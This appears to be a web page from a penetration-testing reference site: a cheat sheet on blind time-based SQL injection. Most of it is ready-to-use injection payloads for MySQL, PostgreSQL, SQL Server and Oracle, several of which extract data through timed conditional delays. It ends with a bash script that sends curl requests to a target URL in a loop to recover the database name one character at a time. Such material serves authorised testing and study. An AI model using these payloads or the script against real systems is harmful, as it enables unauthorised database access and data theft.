Skip to main content

Blind Time-Based SQL Injection

CWECWE-89
Toolssqlmap, ghauri
Difficulty🔴 advanced

Blind Extraction -- Time-Based​

Time-based blind injection is used when there is no visible difference between true and false responses. You force the database to delay its response to infer information.

MySQL​

-- Basic delay
' AND SLEEP(5)--

-- Conditional delay (if condition is true, sleep)
' AND IF(1=1,SLEEP(5),0)--

-- Extract data with timing
' AND IF(ASCII(SUBSTRING(DATABASE(),1,1))>64,SLEEP(5),0)--

-- BENCHMARK alternative (heavy computation)
' AND BENCHMARK(10000000,SHA1('test'))--

PostgreSQL​

-- Basic delay
'; SELECT pg_sleep(5);--

-- Conditional delay
' AND (SELECT CASE WHEN 1=1 THEN pg_sleep(5) ELSE pg_sleep(0) END)--

-- Heavy computation alternative
' AND (SELECT COUNT(*) FROM generate_series(1,5000000))>0--

Microsoft SQL Server​

-- Basic delay
'; WAITFOR DELAY '0:0:5';--

-- Conditional delay
' IF 1=1 WAITFOR DELAY '0:0:5'--

-- Data extraction
' IF ASCII(SUBSTRING(DB_NAME(),1,1))>64 WAITFOR DELAY '0:0:5'--

Oracle​

-- DBMS_PIPE method
' AND 1=(SELECT CASE WHEN 1=1 THEN DBMS_PIPE.RECEIVE_MESSAGE('a',5) ELSE 0 END FROM dual)--

-- Heavy query alternative
' AND 1=(SELECT COUNT(*) FROM all_objects a, all_objects b, all_objects c)--

Time-Based Extraction Automation​

#!/bin/bash
threshold=4  # seconds
for pos in $(seq 1 20); do
    for char in $(seq 32 126); do
        start=$(date +%s)
        curl -s "https://target.com/api?id=1' AND IF(ASCII(SUBSTRING(DATABASE(),$pos,1))=$char,SLEEP(5),0)--" > /dev/null
        end=$(date +%s)
        duration=$((end - start))
        if [ $duration -gt $threshold ]; then
            echo "Position $pos: $(printf "\\x$(printf '%02x' $char)")"
            break
        fi
    done
done